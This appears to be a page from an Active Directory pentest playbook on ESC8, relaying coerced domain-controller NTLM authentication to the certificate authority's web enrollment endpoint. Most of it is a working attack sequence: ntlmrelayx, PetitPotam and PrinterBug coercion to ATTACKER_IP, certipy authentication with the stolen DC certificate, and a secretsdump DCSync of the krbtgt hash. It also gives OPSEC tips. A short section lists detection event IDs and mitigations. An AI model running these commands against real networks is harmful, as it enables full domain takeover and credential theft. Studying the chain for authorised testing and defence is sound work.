attack-33-esc8-ntlm-relay-to-adcs-http-endpoint.md (5540B)
1 --- 2 title: "Attack #33 โ ESC8 NTLM Relay to ADCS HTTP Endpoint" 3 description: "ESC8 is one of the most impactful ADCS attacks โ it enables a full domain compromise from unauthenticated or low-privileged access by combining NTLMโฆ" 4 category: active-directory 5 subcategory: "ADCS & Certificates" 6 tags: ["active-directory", "adcs", "credential-access", "ntlm", "relay"] 7 tools: ["Impacket", "Certipy"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Four/๐ข Attack #33 โ ESC8 NTLM Relay to ADCS HTTP Endpoint.md" 11 --- 12 # ๐ข Attack #33 โ ESC8: NTLM Relay to ADCS HTTP Endpoint 13 14 *** 15 16 ## ๐ How It Works 17 18 ESC8 is one of the **most impactful ADCS attacks** โ it enables a full domain compromise from **unauthenticated or low-privileged access** by combining **NTLM coercion** (PetitPotam, PrinterBug) with **NTLM relay** to the CA's Web Enrollment HTTP endpoint. The attacker coerces a Domain Controller to authenticate, relays that authentication to the CA's HTTP enrollment service, and requests a certificate as the DC machine account โ then uses that certificate to DCSync. 19 20 ### Attack Chain 21 22 ``` 23 1. Start ntlmrelayx targeting the CA's HTTP enrollment endpoint 24 2. Coerce DC to authenticate to your listener (PetitPotam/PrinterBug) 25 3. ntlmrelayx relays DC's NTLM auth to the CA web enrollment 26 4. CA issues a certificate for the DC machine account 27 5. Use the DC certificate to authenticate and DCSync 28 ``` 29 30 *** 31 32 ## โ๏ธ Prerequisites 33 34 | Requirement | Detail | 35 |---|---| 36 | **CA Web Enrollment enabled (HTTP)** | `/certsrv/` endpoint accessible over HTTP | 37 | **No EPA (Extended Protection for Auth)** | EPA must be disabled for relay to work | 38 | **Coercion capability** | PetitPotam, PrinterBug, DFSCoerce, etc. | 39 | **Network position** | Can reach both DC and CA | 40 41 *** 42 43 ## ๐ ๏ธ Tools 44 45 | Tool | Platform | Notes | 46 |---|---|---| 47 | **ntlmrelayx.py** | Linux | `--adcs` flag for certificate enrollment relay | 48 | **PetitPotam** | Linux | Coerce DC authentication | 49 | **printerbug.py** | Linux | Alternative coercion | 50 | **Certipy** | Linux | Relay module for ADCS | 51 | **Coercer** | Linux | Multi-protocol coercion | 52 53 *** 54 55 ## ๐ป Full Commands 56 57 ### ๐ด Full ESC8 Attack 58 59 ```bash 60 # โโ Step 1: Start ntlmrelayx targeting CA web enrollment โโโโโโโโโโโโโโโโโโโโโโ 61 ntlmrelayx.py -t http://CA01.corp.local/certsrv/certfnsh.asp \ 62 -smb2support --adcs --template DomainController 63 64 # โโ Step 2: Coerce DC authentication to your listener โโโโโโโโโโโโโโโโโโโโโโโโ 65 # PetitPotam (unauthenticated on unpatched): 66 python3 PetitPotam.py ATTACKER_IP DC01.corp.local 67 68 # Or with credentials: 69 python3 PetitPotam.py -u low_user -p 'Password1' -d corp.local \ 70 ATTACKER_IP DC01.corp.local 71 72 # Or PrinterBug: 73 printerbug.py corp.local/low_user:'Password1'@DC01.corp.local ATTACKER_IP 74 75 # โโ ntlmrelayx output: โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 76 # [*] SMBD: Received connection from 10.10.10.10 77 # [*] Relaying to http://CA01.corp.local/certsrv/certfnsh.asp 78 # [*] Certificate successfully enrolled! 79 # [*] Base64 certificate: <long_base64_string> 80 81 # โโ Step 3: Save the base64 certificate โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 82 echo "<base64_cert>" | base64 -d > dc01.pfx 83 84 # โโ Step 4: Authenticate with the DC certificate โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 85 certipy auth -pfx dc01.pfx -dc-ip 10.10.10.10 86 # Returns DC01$ NT hash 87 88 # โโ Step 5: DCSync with DC machine hash โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 89 secretsdump.py corp.local/'DC01$'@DC01.corp.local \ 90 -hashes :<DC01_NTHASH> -just-dc-user krbtgt 91 ``` 92 93 ### ๐ด Using Certipy Relay Module 94 95 ```bash 96 # โโ Certipy relay (alternative to ntlmrelayx) โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 97 certipy relay -ca CA01.corp.local -template DomainController 98 99 # Then coerce with PetitPotam as above 100 ``` 101 102 *** 103 104 ## ๐ฏ OPSEC Tips 105 106 - **PetitPotam may work unauthenticated** on unpatched DCs โ highest impact scenario 107 - **ESC8 is the quintessential ADCS attack** โ shown in every major pentest certification 108 - **Check for EPA** before attempting โ Certipy `find` will report if EPA is enforced 109 - **The certificate template must be DomainController or Machine** โ to get a cert for the DC 110 111 *** 112 113 ## ๐ก๏ธ Detection โ Event IDs 114 115 | Event ID | Source | What to Look For | 116 |---|---|---| 117 | **4886** | Security Log (CA) | Certificate enrollment for DC machine account from unexpected source | 118 | **4768** | Security Log (DC) | PKINIT TGT request from unexpected host | 119 | **4624** | Security Log (DC) | NTLM logon from unexpected source to CA | 120 121 *** 122 123 ## ๐ Attack Chain Context 124 125 ``` 126 [ESC8] โโโ NTLM Relay to CA โ DC certificate โ DCSync โ domain compromise 127 โ 128 โโโโ ๐จ๏ธ Coerce: PetitPotam (#41) / PrinterBug (#42) 129 โโโโ ๐ฉธ DC cert โ DCSync โ KRBTGT โ Golden Ticket 130 โโโโ ๐ฅ Potentially unauthenticated full domain compromise 131 โโโโ ๐ Defeated by: enable EPA, enforce HTTPS, disable web enrollment 132 ``` 133 134 *** 135 136 > โ **Attack #33 โ ESC8 complete.**